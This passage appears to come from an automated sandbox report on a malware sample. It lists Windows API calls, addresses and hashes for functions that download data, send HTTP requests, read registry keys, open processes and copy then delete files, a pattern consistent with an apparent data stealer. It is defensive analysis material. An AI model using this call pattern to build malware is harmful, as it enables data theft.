                    • lstrcat.KERNEL32(0064A668,00000000), ref: 040A793A
                    • lstrcat.KERNEL32(0064A668,00421808), ref: 040A7954
                    • task.LIBCPMTD ref: 040A7962
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID:
                    • API String ID: 2677904052-0
                    • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                    • Instruction ID: 5e8a85f221a8fa5c75a95b332eba47c8899c5ad05a5124589d97c5045e68015f
                    • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                    • Instruction Fuzzy Hash: AC317E76A40109EFDB08FBE0DC94DFE777AEB45309B10A018E102772A0DA35F946CB62
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 040A5231
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040A5238
                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 040A5251
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 040A5278
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 040A52A8
                    • memcpy.MSVCRT(00000000,?,00000001), ref: 040A52F1
                    • InternetCloseHandle.WININET(?), ref: 040A5320
                    • InternetCloseHandle.WININET(?), ref: 040A532D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                    • String ID:
                    • API String ID: 1008454911-0
                    • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                    • Instruction ID: 31060879dc28ef6ec27d56d03e495b37c5c73ac1e3b943aa939aefcfd3d95bbd
                    • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                    • Instruction Fuzzy Hash: 7C31F7B8A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E609B7280D7746AC58F99
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                    • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                    • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                    • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                    • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                    • InternetCloseHandle.WININET(?), ref: 004050C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                    • String ID:
                    • API String ID: 3894370878-0
                    • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                    • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                    • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                    • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                    APIs
                      • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                      • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 040B58AB
                    • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 040B5908
                    • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 040B5ABE
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040B5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 040B548F
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 040B557F
                      • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B5596
                      • Part of subcall function 040B5527: StrStrA.SHLWAPI(00000000,00000000), ref: 040B55CB
                      • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B55EA
                      • Part of subcall function 040B5527: strtok.MSVCRT(00000000,?), ref: 040B5605
                      • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B5615
                    • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 040B59F2
                    • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 040B5BA7
                    • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 040B5C73
                    • Sleep.KERNEL32(0000EA60), ref: 040B5C82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleepstrtok
                    • String ID:
                    • API String ID: 3630751533-0
                    • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                    • Instruction ID: 2f314621cda67b337c6695084a39a19932e890f2953e2833ba96f6e604f4cca1
                    • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                    • Instruction Fuzzy Hash: 7DE13171A00204ABEB18FBE0DD95DEE7379AF5520CF408168948676094EF797B08CFDA
                    APIs
                    • memset.MSVCRT ref: 040A158E
                      • Part of subcall function 040A1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 040A151B
                      • Part of subcall function 040A1507: RtlAllocateHeap.NTDLL(00000000), ref: 040A1522
                      • Part of subcall function 040A1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 040A153E
                      • Part of subcall function 040A1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 040A155C
                      • Part of subcall function 040A1507: RegCloseKey.ADVAPI32(?), ref: 040A1566
                    • lstrcat.KERNEL32(?,00000000), ref: 040A15B6
                    • lstrlen.KERNEL32(?), ref: 040A15C3
                    • lstrcat.KERNEL32(?,004262E4), ref: 040A15DE
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 040A16CC
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                      • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                      • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                      • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                      • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                      • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                    • DeleteFileA.KERNEL32(00000000), ref: 040A1756
                    • memset.MSVCRT ref: 040A177D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID:
                    • API String ID: 3885987321-0
                    • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                    • Instruction ID: d7259859b00212b3a75d41c104c823ec99fd80cac9787f23bc8a99ae053e1133
                    • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                    • Instruction Fuzzy Hash: 225163B1A502189BDB15FB60DD91EED737CAF54308F4041A8A64A72081EF347B89CFA9
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                    • wsprintfA.USER32 ref: 00418459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,024EBB88,00000000,000F003F,?,00000400), ref: 004184EC
                    • lstrlenA.KERNEL32(?), ref: 00418501
                    • RegQueryValueExA.ADVAPI32(00000000,024EBBA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                    • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                    • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                    • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                    APIs
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??2@$CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1683549937-4251816714
                    • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                    • Instruction ID: afd3b67111c795beef8d20d78c200321665bb365290c42fa179b2b392ae3ba18
                    • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                    • Instruction Fuzzy Hash: 062158B5D00219ABDF10DFA4E848AED7B74FF04324F008229E965BB290EB706A15CF95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B790B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B7912
                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 040B7944
                    • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 040B7965
                    • RegCloseKey.ADVAPI32(00000000), ref: 040B796F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                    • Instruction ID: effd7863d1bbf02604f2b498f62f1c3364e80d7716a07cc6e101e4791c592c54
                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                    • Instruction Fuzzy Hash: E0014FBDA80204FFEB00DBE0DD49FADB7BDEB48705F005154FA45A7281D674A900CB95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                    • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                    • RegOpenKeyExA.ADVAPI32(80000002,024BA4A0,00000000,00020119,00000000), ref: 004176DD
                    • RegQueryValueExA.ADVAPI32(00000000,024EBA20,00000000,00000000,?,000000FF), ref: 004176FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3466090806-2517555085
                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                    • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                    • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                    • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                    • RegOpenKeyExA.ADVAPI32(80000002,024BA4A0,00000000,00020119,004176B9), ref: 0041775B
                    • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                    • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3466090806-1022791448
                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                    • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                    • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                    APIs
                    • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                    • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                    • CloseHandle.KERNEL32(000000FF), ref: 00419327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :A$:A
                    • API String ID: 1378416451-1974578005
                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                    • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                    • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 040A75A1
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 040A7618
                    • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 040A7674
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 040A76B9
                    • HeapFree.KERNEL32(00000000), ref: 040A76C0
                      • Part of subcall function 040A94A7: vsprintf_s.MSVCRT ref: 040A94C2
                    • task.LIBCPMTD ref: 040A77BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                    • String ID:
                    • API String ID: 700816787-0
                    • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                    • Instruction ID: 08b26f71d29e7f90fb721eaca1df49751853e721d14ad5b4aa001a20a95b5fd7
                    • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                    • Instruction Fuzzy Hash: A761DAB59001689BDB24DB90CC54FEDB7B8BF44308F0085E9E649A6140DBB0ABD5CF95
                    APIs
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 040A6548
                      • Part of subcall function 040A64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 040A656A
                      • Part of subcall function 040A64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A659C
                      • Part of subcall function 040A64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A65EC
                      • Part of subcall function 040A64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 040A6626
                      • Part of subcall function 040A64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 040A6638
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 040B557F
                    • lstrlen.KERNEL32(00000000), ref: 040B5596
                      • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 040B55CB
                    • lstrlen.KERNEL32(00000000), ref: 040B55EA
                    • strtok.MSVCRT(00000000,?), ref: 040B5605
                    • lstrlen.KERNEL32(00000000), ref: 040B5615
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                    • String ID:
                    • API String ID: 3532888709-0
                    • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                    • Instruction ID: ce1a30278e309acd82cb0f034ae0b6f31c77163877f1a26caa06769650f3ab39
                    • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                    • Instruction Fuzzy Hash: C6510B70610208ABEB18FFA4DE95EED7775AF1030CF544018E8867A590EB347B45CFA9
                    APIs
                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 040B7345
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • OpenProcess.KERNEL32(001FFFFF,00000000,040B7574,004205BD), ref: 040B7383
                    • memset.MSVCRT ref: 040B73D1
                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 040B7525
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenProcesslstrcpymemset
                    • String ID:
                    • API String ID: 224852652-0
                    • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                    • Instruction ID: 1241c14ee1f31fadc365b6fb90ab5e906a3a8f559e6ad298e695d39bef54af7f
                    • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                    • Instruction Fuzzy Hash: 245161B0D00218DBDB14EB94DC84BEDB7B4AF44309F5085A9D14577181EB747A84CFAD
                    APIs
                    • memset.MSVCRT ref: 040B433C
                    • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 040B435B
                    • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 040B437F
                    • RegCloseKey.ADVAPI32(?), ref: 040B4389
                    • lstrcat.KERNEL32(?,00000000), ref: 040B43AE
                    • lstrcat.KERNEL32(?,0064A168), ref: 040B43C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValuememset
                    • String ID:
                    • API String ID: 2623679115-0
                    • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                    • Instruction ID: 7504596a76602f89fec6bbbd526ffb00169b60d402fb4e0f62f0ee2b7f5979b2
                    • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                    • Instruction Fuzzy Hash: 6D41A7B6D40108BBEB14FBE0DC45FEE737DAB89304F00855CA65567280EA756798CBE1
                    APIs
                    • memset.MSVCRT ref: 004140D5
                    • RegOpenKeyExA.ADVAPI32(80000001,024EBF30,00000000,00020119,?), ref: 004140F4
                    • RegQueryValueExA.ADVAPI32(?,024ECD58,00000000,00000000,00000000,000000FF), ref: 00414118
                    • RegCloseKey.ADVAPI32(?), ref: 00414122
                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                    • lstrcatA.KERNEL32(?,024ECD88), ref: 0041415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValuememset
                    • String ID:
                    • API String ID: 2623679115-0
                    • Opcode ID: fa8b58036ffac9d5281ddaf2101bc218c73992fb998376cc82465a095904cdcb
                    • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                    • Opcode Fuzzy Hash: fa8b58036ffac9d5281ddaf2101bc218c73992fb998376cc82465a095904cdcb
                    • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                    APIs
                    • strtok_s.MSVCRT ref: 00413588
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • strtok_s.MSVCRT ref: 004136D1
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
